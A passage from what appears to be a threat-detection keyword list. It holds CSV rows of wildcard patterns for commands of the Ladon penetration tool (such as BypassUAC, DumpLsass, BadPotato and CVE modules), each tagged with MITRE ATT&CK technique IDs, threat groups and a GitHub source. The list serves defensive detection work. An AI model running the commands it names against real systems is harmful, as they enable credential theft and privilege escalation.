-*Ladon *VncScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon *WebScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon *WinrmScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon *WmiHashScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon *WmiScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon ActiveAdmin*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon ActiveGuest*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon AdiDnsDump *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon at c:*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon AtExec*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon AutoRun*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon BadPotato*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon BypassUAC*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon CheckDoor*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon Clslog*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon CmdDll *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon cmdline*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon CVE-*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon DirList*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon DraytekExp*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*Ladon DumpLsass*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
